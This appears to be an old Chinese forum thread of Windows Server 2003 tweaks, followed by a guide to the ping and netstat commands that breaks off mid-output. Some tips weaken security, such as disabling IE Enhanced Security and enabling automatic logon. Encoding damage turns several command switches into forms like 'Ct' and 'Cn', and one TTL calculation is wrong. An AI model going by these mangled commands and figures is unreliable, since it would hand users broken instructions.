　 1、打开控制面板窗口，双击“电源选项”图标，在随后出现的电源属性窗口中，进入到“高级”标签页面；

　 2、在该页面的“电源按钮”设置项处，将“在按下计算机电源按钮时”设置为“关机”，单击“确定”按钮，来退出设置框；

3、以后需要关机时，可以直接按下电源按键，就能直接关闭计算机了。当然，我们也能启用休眠功能键，来实现快速关机和开机；

4、要是系统中没有启用休眠模式的话，可以在控制面板窗口中，打开电源选项，进入到休眠标签页面，并在其中将“启用休眠”选项选中就可以了。 　　

　　五、调用Windows XP风格界面

安装完Windows Server

　 2003系统进入到桌面时，我们会发现系统桌面的显示样式为“Windows经典样式”。看惯了这种样式后，就会感觉到有点乏味，想不想改变一下桌面的显示风格？要是你企图通过显示属性的外观设置中，来调用其他风格界面时，就发现此“路”不通；通过组策略来调用时，发现只有当前样式可以选择。那么我们有没有办法来调用其他风格样式呢，例如Windows

XP样式？按照下面方法，我们就能轻松实现调用目的：

1、在系统的开始菜单中，依次展开控制面板、管理工具和服务窗口，在对应服务的右边子窗口中，用鼠标选中“Themes”选项；

2、仔细查看该选项的参数时，发现该服务在缺省状态下是被禁止使用的，因此我们就无法调用其他风格样式；

　 3、为此，我们必须启动该服务；用鼠标双击该服务选项，然后打开常规标签页，将对应该服务的启动类型设置为“自动”，再点一下“应用”按钮；

4、此时，“服务状态”设置项中的“启动”按钮就自动被激活了，单击该“启动”按钮，就能将系统中的Themes服务起用了；

5、返回到系统桌面，并用鼠标右键单击空白处，从快捷菜单中执行“属性”命令，再打开外观标签页面，在其中的“窗口和按钮”处，选中Windows XP样式或者其他显示样式。

6、至此，系统中的工具栏菜单、窗口等样式就会按照指定的风格来显示了。

　　六、调整Windows Media Player的播放模式

要是在使用Windows Media

Player播放音乐的同时，我们还打开了多个工作窗口，这样我们就会经常需要在工作窗口和WMP播放界面中来回切换，这样会大大影响工作效率。现在，可以通过下面方法来调整WMP的播放模式，让操作者不需要打开WMP的主界面就能控制音乐的播放，以便不影响其他工作窗口：

1、用鼠标右键单击系统任务栏中的空白处，从打开的快捷菜单中，执行“工具栏”下面的“Windows Media Player”命令；

　 2、此后，Windows Media

　 Player界面中的播放按钮就会自动缩小并显示在系统任务栏中了，利用这里的按钮，我们就能执行音乐的播放、暂停、上一首或者下一首命令了；

　 3、通过这种调整，我们再也用不着手忙脚乱地在程序窗口和WMP播放界面中，来回切换了。
七、为指定组添加新用户

　　想在Windows Server 2003系统中添加新用户时，发现该系统控制面板窗口中却没有我们非常熟悉的“用户”图标，那么我们该从哪里着手，才能为系统的指定组添加新用户呢？呵呵，Windows

　 Server 2003看来就是不一样！笔者经过几次摸索，发现为指定组添加新用户的方法，具体步骤如下： 　　

1、用鼠标右键单击桌面上的“我的电脑”图标，从打开的快捷菜单中，执行“管理”命令，弹出一个计算机管理窗口；

2、展开该窗口中的“本地用户和组”文件夹，然后选中该文件夹下面的“用户”选项，此时在右边的子窗口中，我们就能看到当前系统中已经存在的所有用户了，其中标有红色叉号的用户表示已经创建但并没有启用；

3、用鼠标右键单击右边子窗口的空白处，从右键菜单中执行“添加新用户”命令，在随后出现的窗口中，输入需要添加的用户的相关信息，最后单击一下“创建”按钮，来结束新用户的添加工作；

4、要想让该用户添加到指定组的话，可以选择“组”选项，再从右边的子窗口中，选中需要加入的组名称，并用鼠标右击之，执行快捷菜单中的“添加到组”命令；

5、在随后出现的界面中，再单击“添加”命令，将前面创建的用户添加进来就可以了。

　　八.禁用配置服务器向导

由于不需要服务器设置功能，首先我们先禁止“配置你的服务器”（Manage Your Server）向导的出现，你可以在控制面板（Control Panel） -> 管理员工具（Administrative Tools ）-> 管理你的服务器（Manage Your Server）运行它，然后在窗口的左下角复选“登录时不要显示该页”（Don''t display this page at logon）。

　九.建立一个新的用户账号

　 windows server 2003不支持类似于Windows

　 XP的登录欢迎屏幕。你可以在首次进入系统后建立一个有你个性的新用户账号。

　 打开“开始”（Start） -> “运行”（Run） -> 键入“lusrmgr.msc ”，你将看到本地用户和组（Local Users and Groups ），

　 右键点击左边窗口的“用户”（Users），选择“新用户”（New User）.在弹出的对话框中输入账号信息,然后点击“建立”（Great）。这样你的账号就可用了，当然，你可以选择把你的账号添加到管理员组，右键点击你新建的用户。然后选择“属性”（Properties）

　 -> 点击“隶属于” on Member of tab -> “添加”Add.. -> “高级”Advanced -> “现在查找”Find Now 。 　　

　 在查找结果对话框中双击“管理员”（Administrators），在点击两次“确定”（Ok）后关闭“本地用户和组”（Local Users and Groups window ），现在你将可以注销Administrator用户用你自己的账号登录系统。 　

　　十.禁用Internet Explorer Enhanced Security

　 作为新windows组件出现的IE安全插件－－Internet Explorer Enhanced urity默认把你IE安全设置为最高。这样你将在访问站点弹出询问框并对你浏览网页及文件下载做出阻止的行为。我们其实不一定需要这个组件。 　

　 我们首先禁止询问框的出现,在弹出的对话框中复选”以后不要显示这个信息“ （In the future, do not show this message）然后，我们可以在IE工具选项中自定义设置IE的安全级别。在”安全“（Security）选项卡上拉动滚动条把Internet区域安全设置为”中“（Medium），这个级别将适合大多数人，要是你有特别要求，这个步骤将不适合你。 　　

　 通过对IE安全的设置，你现在安装可以上Sun''s Java VM!

当然，你甚至可以在控制面板－－添加程序－－添加或删除Windows组件中卸载Internet Explorer Enhanced Security 。
十一.安装Java VM

　　Windows server 2003没有集成MS Java VM或Sun Java VM,你可以自行下载并安装它。　

　　十二.禁止关机事件跟踪

　　关机事件跟踪（Shutdown Event Tracker）也是Windows server

　 2003区别于其他工作站系统的一个设置，对于服务器来说这是一个必要的选择，但是对于工作站系统却没什么用，我们同样可以禁止它。

　 打开”开始“Start ->”运行“ Run ->输入”gpedit.msc “，在出现的窗口的左边部分，选择”计算机配置“（Computer Configuration ）-> ”管理模板“（Administrative Templates）-> ”系统“（System）,在右边窗口双击“Shutdown Event Tracker” 在出现的对话框中选择“禁止”（Disabled），点击然后“确定”（OK）保存后退出这样，你将看到类似于windows 2000的关机窗口 　

　　十三.启用硬件和DirectX加速

　　 ★硬件加速：桌面点击右键－－属性（Properties） -> 设置（Settings ）－－高级（ Advanced）－－疑难解答（Troubleshoot）。把该页面的硬件加速滚动条拉到“完全”（Full），最好点击“确定”（OK）保存退出。这期间可能出现一瞬的黑屏是完全正常。

　 ★DirectX加速：打开“开始”（Start） -> “运行”（Run），键入“dxdiag”并回车打开“DirectX

　 诊断工具”（DirectX Tools），在“显示”（Display）页面，点击DirectDraw, Direct3D and AGP

Texture 加速三个按钮启用加速。 　

　　十四.允许声音加速

　　 如果你使用的是Windows server 2003标准版请从第二步xx作，因为标准版已允许声音服务。

　　 ★打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，在出现的窗口中找到“Windows

　 Audio”并双击它，然后在启动模式（startup type）的下拉菜单选择“自动”（Automatic），并点击“应用”（Apply） ->“开始”（Start） -> “确定”（OK） 　　

　 ★打开“开始”（Start） -> “运行”（Run），键入“dxdiag”并回车打开“DirectX 诊断工具”（DirectX

Tools），在“Sound”（Display）页面，把“声音的硬件加速级别”（Hardware Sound Acceleration Level）滚动条拉到“完全加速”（ Full leration）。 　

　　十五.启用桌面主题

　 也许你对WINDOWS经典的桌面已经感到厌烦的话，你就要考虑启用桌面主题了，Windows server 2003默认是关闭此服务的。

　 打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，在出现的窗口寻找Themes并双击它，

然后在启动模式（startup type ）的下拉菜单选择“自动”（Automatic），并点击“应用”（Apply）

　 ->“开始”（Start） -> “确定”.

　　 这样的xx作也是只能让你使用Windows自带的Luna主题的三个模式，假如你希望使用更多的第三方主题文件的话，你需要使用修改的Uxtheme.dll文件来支持它，关于修改的Uxtheme.dll文件，你可以在http://vortex.winbeta.org/找到更多。
十六.允许内置的IMAPI CD-Burning服务和支持Windows影像设备服务

　 ★假如你希望启用Windows内置的IMAPI CD-Burning服务。做如下xx作：

　 打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，在出现的窗口中找到“IMAPI CD-Burning COM Service ”并双击它，然后在启动模式（startup type ）的下拉菜单选择“自动”（Automatic），并点击“应用”（Apply） ->“开始”（Start） -> “确定”（OK）

★假如你有如数码相机和扫描仪之类的影像设备，你应该打开Windows Image Acquisition 服务。

打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，在出现的窗口中找到“Windows Image

　 Acquisition (WIA) ”并双击它，然后在启动模式（startup type ）的下拉菜单选择“自动”（Automatic），并点击“应用”（Apply） ->“开始”（Start） -> “确定”（OK） 　　

　　十七.高级设置

　 我们可以修改一些windows server 2003的高级设置以适合工作站的应用环境。

★右键点击“我的电脑”（My Computer）－－属性（Properties）－－高级（Advanced）－－性能（Performance）－－设置（Setting）－－高级（Advanced），把“处理器计划”（Processor scheduling ）和内存使用（Memory usage）分配给“程序”（Programs）使用。然后点击“确定”（OK.）　　

★禁用错误报告

　 右键点击“我的电脑”（My Computer）－－属性（Properties）－－高级（Advanced）－－点击“错误报告”（Error Reporting ）按钮，在出现的窗口中把“禁用错误报告”（Disable Error Reporting）选上并复选“但在发生严重错误时通知我”（But, notify me when critical errors occur.）

---

作者: emma336699    时间: 2004-6-11 22:12
接上
★调整虚拟内存

正常运行Windows所需要的虚拟内存是作为物理内存的“后备力量”而存在的，虽然运行速度上硬盘不如内存，但在容量上内存是无法与硬盘相提并论的。所以我们一直是认为虚拟内存越大越好，其实事实上并不是这样的，尤其是安装Windows server

　 2003用做工作站的环境下并不承担高负荷工作的情况下，我们可以试试禁用虚拟内存。前提是你必须拥有512M物理内存以上。很多朋友担心如果禁用虚拟内存会不会象在Windows

9x环境下一样造成系统无法正常待机和休眠的情况，其实不会这样的，因为从windows

　 xp开始它的虚拟内存（即pagefile.sys）是专用于数据交换的，待机模式时数据依旧保留在物理内存中，休眠模式也有其专用的休眠文件（Hiberfil.sys），所以绝对不会出现系统无法休眠的问题。而使用Windows server 2003的一些朋友经常会对其的关机和注销缓慢感到束手无策，在此我个人的解决办法就是禁用虚拟内存，这样你的注销和关机时间可能会加快很多。我今天做了测试，在加载虚拟内存的情况下注销用户重登陆windows的时间是3秒，关机是23秒。但是在禁用虚拟内存的情况下注销重登陆的时间减少到2秒，而关机时间缩短到3秒。　

　 右键点击“我的电脑”（My Computer）－－属性（Properties）－－高级（Advanced）－－性能（Performance）－－设置（Setting）－－高级（Advanced），点击“虚拟内存”（Virtual memory）部分的“更改”（Change），然后在出现的窗口选择“无分页文件”。重启系统即可。

　 注意：调整虚拟内存部分经过个人测试无任何问题，但是不保证在您的机器上也是这样，所以我不对此设置造成的任何后果承担责任。只是建议对Windows server 2003关机速度有怨言的朋友尝试。 　　

　　十八.自动登陆 　　

Windows Server 2003默认是使用"CTRL-ATL-DEL to login" 对话框来登陆Windows的，不过我们我们可以使用Windows XP的Tweak UI来使Server 2003自动登陆。

下载：Tweak UI

　 Http://www.ssite.org/uppic/sun_pic/...003/tweakui.exe 　　

　 下载后直接执行tweakui.exe 在左边的面板中选择Logon -> Autologon -> 在右边勾选Log on automatically at system startup输入你的用户名和域名（如果没有就不写）点下面的Set Password，输入用户名的密码，然后点击OK。 　　

　　虽然同样的功能通过修改注册表也能完成，但是修改注册表的方法密码在注册表中表现的是明文，而Tweak

　　UI在注册表中不会留下明文的密码，所以推荐使用Tweak UI来完成这项工作。
十九.安装DirectX 9a 　　

　　 在Windows Server 2003上安装DirectX 9a和在其他版本的Windows上安装DirectX 9a的方法是一样的。安装之前先启用DirectX and Graphics Acceleration。　　

　 下载：DirectX 9.0a Websetup

http://download.microsoft.com/downl.../dxwebsetup.exe

　　二十.隐藏文件 　　

　　Windows Server 2003默认情况下是显示所有的文件夹的，如果你不想这样，可以通过一下方法来隐藏：

　　 打开任意一个文件夹，选择Tools -> Folder Options -> View，选择Do not show hidden files and folders，点击OK。 　　

　　 在Windows Server 2003中，已经安装了Windows Media Player 9，点击Start -> Programs -> Accessories -> Entertainment -> Windows Media Player就可以打开它。 　　

　　二十一.启用 ASP 支持

　　Windows Server 2003 默认安装，是不安装 IIS 6 的，需要另外安装。安装完 IIS 6，还需要单独开启对于 ASP 的支持。方法是：

　　控制面板 -> 管理工具 -> Web服务扩展 -> Active Server Pages -> 允许 　　

　　二十二.启用摄像机，摄像头或者扫描仪等设备

　　在运行中输入Services.msc并回车，找到并双击Windows Image Acquisition (WIA) 服务，设置启动类型为Automatic点击Apply后点击Start然后点击OK。
二十三.在Win 2003中配置NAT服务器

　　如何通过使用Windows Server 2003来配置网络地址转换(NAT)服务器。Windows Server 2003“路由和远程访问”服务包括NAT路由协议。如果将NAT路由协议安装和配置在运行“路 由和远程访问”的服务器上，则使用专用Internet协议(IP)地址的内部网络客户端可以通过NAT服务器的外部接口访问Internet。

　　如何配置路由和远程访问NAT服务器

　　当内部网络客户端发送要连接Internet的请求时，NAT协议驱动程序会截取该请求，并将其转发到目标Internet服务器。所有请求看上去都像是来自NAT服务器的外部IP地址。这样就隐藏您的内部IP地址配置。

　　配置“路由和远程访问”NAT服务器：

　　在管理工具菜单中，选中“路由和远程访问”。

　　在“路由和远程访问”MMC中，展开您的服务器名称（其中服务器名称是您要配置服务器的名称，然后展开左窗格中的IP路由。

　　选中常规，然后选择新建路由协议。

　　单击NAT/基本防火墙复选框，将其选中，然后点确定。

　　右键单击左窗格中的NAT/基本防火墙，然后单击新建接口。

　　单击表示内部网络接口的接口，然后单击确定。

　　在“网络地址转换”属性中，单击“专用接口连接到专用网络”，然后单击确定。

　　右键单击左窗格中的NAT/基本防火墙，然后点新建接口。

　　单击表示外部网络接口的接口，然后点确定。　　

　　在“网络地址转换”属性中，单击“公用接口连接到Internet”。

　　单击“在此接口上启用NAT”复选框，将其选中，点确定。

　　NAT服务器可以自动为内部网络客户端分配IP地址。如果您没有已给内部网络上的客户端分配了地址信息的DHCP服务器，则可能会需要使用此功能。

　　如何配置路由和远程访问NAT服务器以分配IP地址和执行代理DNS查询NAT服务器还可以代表NAT客户端执行域名系统(DNS)查询。“路由和远程访问”NAT服务器对包括在客户端请求中的Internet主机名进行解析，然后将该IP地址转发给该客户端。

　　要配置“路由和远程访问”NAT服务器来分配IP地址并且代表内部网络客户端执行代理DNS查询，请按以下步骤操作：

　　右键单击左窗格中的NAT/基本防火墙，然后单击属性。

　　单击地址分配选项卡，然后单击“使用DHCP自动分配IP地址”复选框，将其选中。

　　在IP地址框中，键入网络ID。

　　在掩码框中，键入子网掩码。

　　选择名称解析选项卡，然后单击“使用域名系统(DNS)的客户端”复选框，将其选中。

　　如果您使用请求拨号接口连接到Internet，请单击“当名称需要解析时连接到公用网络”复选框，将其选中。

　　在请求拨号接口框中，选中要拨号的接口。

　　选择应用，然后单击确定。

　　备注：完成这些基本配置步骤之后，内部网络客户端就可以访问Internet上的服务器了。

　　如何配置基于Windows Server 2003的计算机以使用NAT服务器

　　单击开始，指向控制面板，指向网络连接，然后单击本地连接。

　　单击属性。

　　单击Internet协议(TCP/IP)。

　　单击属性。

　　在“默认网关”框中，键入NAT服务器的内部IP地址。

　　备注：如果计算机从“动态主机配置协议”(DHCP)服务器接收它的IP地址，请单击高级，单击IP设置选项卡，单击网关下的添加，键入NAT服务器的内部IP地址，单击添加，单击确定，然后继续进行第6步。

　　单击确定，单击确定，然后单击关闭。
二十四.在Win 2003中为SMTP服务配置本地域 　　

　　如何在Windows Server 2003中为SMTP服务配置本地域。如何更改默认域的名称、配置别名域以及指定Drop文件夹。

　　SMTP服务域用于组织要传递的消息。SMTP虚拟服务器至少有一个域：默认的本地域。

　　本地域是由本地SMTP服务器提供服务的域名系统(DNS)域。到达SMTP服务器的包含本地域名的消息或者在本地传送到Drop文件夹，或者与不可传递的(NDR)报告一起返回给发送方。

　　如何重命名默认域

　　默认域用于给来自不含有域的地址的消息加盖戳记。SMTP虚拟服务器必须有一个默认域。无法删除此默认域。

　　默认情况下，在“控制面板”系统工具的计算机名选项卡中指定的名称被用作默认域名。也可以指定一个唯一的名称作为SMTP服务的默认域名。

　　要重命名默认域，请按照下列步骤xx作：

　　启动MicrosoftInternet信息服务(IIS)管理器或打开IIS管理单元。

　　展开Server_name，其中Server_name是服务器的名称，然后展开所需的SMTP虚拟服务器（例如，默认SMTP虚拟服务器）。

　　单击域。

　　在右窗格中，右击默认域，然后单击重命名。

　　键入要使用的名称，然后按ENTER键。

　　退出IIS管理器或关闭IIS管理单元。 　　

　　如何配置别名域

　　别名域是默认域的别名。可以使用与默认域相同的设置来设置别名域。SMTP服务接收的别名域的消息放置在为默认域指定的Drop文件夹中。

　　要配置别名域，请按照下列步骤xx作：

　　启动IIS管理器或打开IIS管理单元。

　　展开Server_name，其中Server_name是服务器的名称，然后展开所需的SMTP虚拟服务器（例如，默认SMTP虚拟服务器）。

　　右键单击域，指向新建，然后单击域。

　　“新建SMTP域向导”启动。

　　单击别名，然后单击下一步。

　　在名称框中键入别名域的名称，然后单击完成。

　　退出IIS管理器或关闭IIS管理单元。

　　如何指定Drop文件夹

　　对于默认域，您必须指定一个放置所有传入消息的文件夹。SMTP服务将别名域的消息放在默认域所使用的Drop文件夹中。

　　默认情况下，Drop文件夹位于Inetpub\Mailroot文件夹中。您可以将任何文件夹指定为Drop文件夹，只要该文件夹是安装SMTP服务的计算机上的本地文件夹，而且没有指定为Pickup文件夹。

　　要更改Drop文件夹的位置，请按照下列步骤xx作：

　　启动IIS管理器或打开IIS管理单元。

　　展开Server_name，其中Server_name是服务器的名称，然后展开所需的SMTP虚拟服务器（例如，默认SMTP虚拟服务器）。

　　单击域。

　　在右窗格中，右击默认域，然后单击属性。

　　单击浏览，找到要用作Drop文件的文件夹，然后单击确定。

　　单击确定。
二十五.为Win 2003中添加LPT端口

　　如何在基于 Microsoft Windows Server 2003 的计算机中添加附加LPT端口。

　　默认情况下，在Windows Server 2003中存在3个 LPT可用端口，它们是 LPT1、LPT2 和 LPT3。可以添加附加LPT端口直到LPT9。添加附加 LPT 端口后，该端口作为可用打印机端口显示在“添加打印机向导”中。

　　如何添加附加LPT端口

　　单击开始\运行。

　　注意：“注册表编辑器”使用不当可造成严重问题，这些问题可能需要重新安装#作系统。Microsoft 不保证能够解决因为“注册表编辑器”使用不当而产生的问题。使用“注册表编辑器”需要您自担风险。

　　在打开框键入regedit，然后单击确定。

　　找到并单击下面的注册表项：

　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports

　　当前 LPT 端口显示在右窗格中。

　　在编辑菜单上，指向新建，然后单击字符串值。

　　键入新值名称。键入 LPT#，其中 # 是所要添加 LPT 端口的序号，然后按 ENTER。例如，键入 LPT4。

　　在文件菜单上，退出“注册表编辑器”。

　　单击开始\运行。

　　在打开框键入cmd，单击确定。

　　停止然后重新启动假脱机服务。为此，请在命令提示符下键入下列命令，在每行后按ENTER 键：

　　net stop spooler

　　net start spooler

　　键入exit退出命令提示符。 　　

　　二十六.加快启动和运行速度 　　

　　修改注册表，减少预读取，减少进度条等待时间：开始→运行→regedit启动注册表编辑器，HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session

　　Manager\Memory Management\PrefetchParameters，有一个键值名为EnablePrefetcher，它的值是3,把它改为“1”或“5”。

　　找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control，

　　将 WaitToKillServiceTimeout 设为：1000或更小。 ( 原设定值：20000 )

　　找到 HKEY_CURRENT_USER\Control Panel\Desktop 键，将右边视窗的WaitToKillAppTimeout 改为 1000， ( 原设定值：20000 )即关闭程序时仅等待1秒。

　　将 HungAppTimeout 值改为：200( 原设定值：5000 )，表示程序出错时等待0.5秒。
二十七.让系统自动关闭停止回应的程式

　　打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键，

　　将 AutoEndTasks 值设为 1。 ( 原设定值：0 ) 　　

　　二十八.禁用系统服务Qos

　　开始菜单→运行→键入 gpedit.msc ，出现“组策略”窗口， 展开 "管理模板”→“网络” ， 展开 "QoS 数据包调度程序"，在右边窗右键单击“限制可保留带宽" ，在属性中的“设置”中有“限制可保留带宽" ，选择“已禁用”，确定即可。当上述修改完成并应用后，用户在网络连接的属性对话框内的一般属性标签栏中如果能够看到"QoS Packet Scheduler（QoS 数据包调度程序）"。说明修改成功，否则说明修改失败。 　　

　　二十九.改变窗口弹出的速度

　　找到HKEY_CURRENT_USER＼Control Panel＼Desktop＼WindowMetrics子键分支，在右边的窗口中找到MinAniMate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁止动画显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改。 　　

　　三十.运行大型软件时系统反应缓慢 　

　　服务器和工作站对系统资源的要求是不相同的，如果我们平时要运行诸如Photoshop、3DSMAX等软件，则应当将系统资源重新分配，修改为类似Windows XP的状态。

　　设置步骤是：进入“控制面板→系统”选择“高级”选项卡，在“性能”栏里点“设置”按钮，选择“高级”选项卡，在“处理器计划”和“内存使用”两栏中均选择“程序”，最后点“确定”并重新启动计算机即可。 　　

　　三十一.解决播放电影时画面粗糙 　　

　　很多朋友都有这样的“遭遇”：自己的电脑配置相当好，安装了Windows 2003时显卡也能够被自动识别并安装，可是播放电影时画面非常粗糙，安装最新版显卡驱动后画面质量依然如故。其实这是因为Windows 2003默认的显示选项没有根据个人用户的需要进行优化所致。

　　解决方法很简单：在桌面上点右键，依次进入“显示属性→设置→高级→疑难解答”，将“硬件加速”游标向右拖至“完全”，点“确定”退出。然后依次进入“开始→所有程序→附件→系统工具→系统信息”，选择“工具→DirectX诊断工具”(由于程序搜集系统信息，所以需要稍微等待一下，可能出现闪屏)，选择“显示”选项卡，依次启用“DirectDraw Acceleration”和“Direct3D Acceleration”项，点“退出”即可。

---

作者: hack    时间: 2004-6-11 22:13
windows常用网络命令详解
一、Ping命令的使用技巧

　　Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数 据报交换并不表示TCP/IP配置就是正确的，我们必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP的正确性。

　　简单的说，Ping就是一个测试程序，如果Ping运行正确，我们大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，Ping也被某些别有用心的人作为DDOS（拒绝服务攻击）的工具，例如许多大型的网站就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。

　　按照缺省设置，Windows上运行的Ping命令发送4个ICMP（网间控制报文协议）回送请求，每个32字节数据，如果一切正常，我们应能得到4个回送应答。 Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL（Time To Live存在时间）值，我们可以通过TTL值推算一下数据包已经通过了多少个路由器：源地点TTL起始值（就是比返回TTL略大的一个2的乘方数）-返回时TTL值。例如，返回TTL值为119，那么可以推算数据报离开源地址的TTL起始值为128，而源地点到目标地点要通过9个路由器网段（128-119）；如果返回TTL值为246，TTL起始值就是256，源地点到目标地点要通过9个路由器网段。

　　1、通过Ping检测网络故障的典型次序

　　正常情况下，当我们使用Ping命令来查找问题所在或检验网络运行情况时，我们需要使用许多Ping命令，如果所有都运行正确，我们就可以相信基本的连通性和配置参数没有问题；如果某些Ping命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：

　　·ping 127.0.0.1
　　这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。

　　·ping 本机IP
　　这个命令被送到我们计算机所配置的IP地址，我们的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。

　　·ping 局域网内其他IP
　　这个命令应该离开我们的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。

　　·ping 网关IP
　　这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。

　　·ping 远程IP
　　如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。

　　·ping localhost
　　localhost是个作系统的网络保留名，它是127.0.0.1的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。

　　·ping www.xxx.com（如www.yesky.com 天极网）
　　对这个域名执行Ping www.xxx.com 地址，通常是通过DNS 服务器 如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：我们也可以利用该命令实现域名对IP地址的转换功能。

　　如果上面所列出的所有Ping命令都能正常运行，那么我们对自己的计算机进行本地和远程通信的功能基本上就可以放心了。但是，这些命令的成功并不表示我们所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。

　　2、Ping命令的常用参数选项

　　·ping IP Ct
　　连续对IP地址执行Ping命令，直到被用户以Ctrl+C中断。

　　·ping IP -l 3000
　　指定Ping命令中的数据长度为3000字节，而不是缺省的32字节。

　　·ping IP Cn
　　执行特定次数的Ping命令。

二、Netstat 命令的使用技巧

　　Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据，一般用于检验本机各端口的网络连接情况。

　　如果我们的计算机有时候接受到的数据报会导致出错数据删除或故障，我们不必感到奇怪，TCP/IP可以容许这些类型的错误，并能够自动重发数据报。但如果累计的出错情况数目占到所接收的IP数据报相当大的百分比，或者它的数目正迅速增加，那么我们就应该使用Netstat查一查为什么会出现这些情况了。

　　1、netstat 的一些常用选项

　　·netstat Cs
　　本选项能够按照各个协议分别显示其统计数据。如果我们的应用程序（如Web浏览器）运行速度比较慢，或者不能显示Web页之类的数据，那么我们就可以用本选项来查看一下所显示的信息。我们需要仔细查看统计数据的各行，找到出错的关键字，进而确定问题所在。

　　·netstat Ce
　　本选项用于显示关于以太网的统计数据。它列出的项目包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量。这些统计数据既有发送的数据报数量，也有接收的数据报数量。这个选项可以用来统计一些基本的网络流量）。

　　·netstat Cr
　　本选项可以显示关于路由表的信息，类似于后面所讲使用route print命令时看到的 信息。除了显示有效路由外，还显示当前有效的连接。

　　·netstat Ca
　　本选项显示一个所有的有效连接信息列表，包括已建立的连接（ESTABLISHED），也包括监听连接请求（LISTENING）的那些连接。

　　·netstat Cn
　　显示所有已建立的有效连接。

　　下面是 netstat 的输出示例：

　　C:\>netstat -e
　　Interface Statistics
　　Received　　　Sent
　　Bytes　　　　　　　　　3995837940　　47224622
　　Unicast packets　　　　120099　　　　131015
　　Non-unicast packets　　7579544　　　 3823
　　Discards　　　　　　　 0　　　　　　 0
　　Errors　　　　　　　　 0　　　　　　 0
　　Unknown protocols　　　363054211

　　C:\>netstat -a
　　Active Connections
　　Proto Local Address　　　Foreign Address　　　 State
　　TCP　CORP1:1572　　　 172.16.48.10:nbsession　 ESTABLISHED
　　TCP　CORP1:1589　　　 172.16.48.10:nbsession　 ESTABLISHED
　　TCP　CORP1:1606　　　 172.16.105.245:nbsession ESTABLISHED
　　TCP　CORP1:1632　　　 172.16.48.213:nbsession　ESTABLISHED
　　TCP　CORP1:1659　　　 172.16.48.169:nbsession　ESTABLISHED
　　TCP　CORP1:1714　　　 172.16.48.203:nbsession　ESTABLISHED
　　TCP　CORP1:1719　　　 172.16.48.36:nbsession　 ESTABLISHED
　　TCP　CORP1:1241　　　 172.16.48.101:nbsession　ESTABLISHED
　　UDP　CORP1:1025　　　 *:*
　　UDP　CORP1:snmp　　　 *:*
　　UDP　CORP1:nbname　　 *:*
　　UDP　CORP1:nbdatagram *:*
　　UDP　CORP1:nbname　　 *:*
　　UDP　CORP1:nbdatagram *:*

　　C:\>netstat -s
　　IP Statistics
　　Packets Received　　　　　　 = 5378528
　　Received Header Errors　　　 = 738854
　　Received Address Errors　　　= 23150
　　Datagrams Forwarded　　　　　= 0
　　Unknown Protocols Received　 = 0
　　Received Packets Discarded　 = 0
　　Received Packets Delivered　 = 4616524
　　Output Requests　　　　　　　= 132702
　　Routing Discards　　　　　　 = 157
　　Discarded Output Packets　　 = 0
　　Output Packet No Route　　　 = 0
　　Reassembly Required　　　　　= 0
　　Reassembly Successful　　　　　　 = 0
　　Reassembly Failures　　　　　　　 =
　　Datagrams Successfully Fragmented = 0
　　Datagrams Failing Fragmentation　 = 0
　　Fragments Created　　　　　　　　 = 0

　　ICMP Statistics
　　Received　Sent
　　Messages　　　　　　　　 693　　　 4
　　Errors　　　　　　　　　 0　　　　 0
　　Destination Unreachable　685　　　 0
　　Time Exceeded　　　　　　0　　　　 0
　　Parameter Problems　　　 0　　　　 0
　　Source Quenches　　　　　0　　　　 0
　　Redirects　　　　　　　　0　　　　 0
　　Echoes　　　　　　　　　 4　　　　 0
　　Echo Replies　　　　　　 0　　　　 4
　　Timestamps　　　　　　　 0　　　　 0
　　Timestamp Replies　　　　0　　　　 0
　　Address Masks　　　　　　0　　　　 0
　　Address Mask Replies　　 0　　　　 0

　　TCP Statistics
　　Active Opens　　　　　　　　 = 597
　　Passive Opens　　　　　　　　= 135
　　Failed Connection Attempts　 = 107
　　Reset Connections　　　　　　= 91
　　Current Connections　　　　　= 8
　　Segments Received　　　　　　= 106770
　　Segments Sent　　　　　　　　= 118431
　　Segments Retransmitted　　　 = 461

　　UDP Statistics
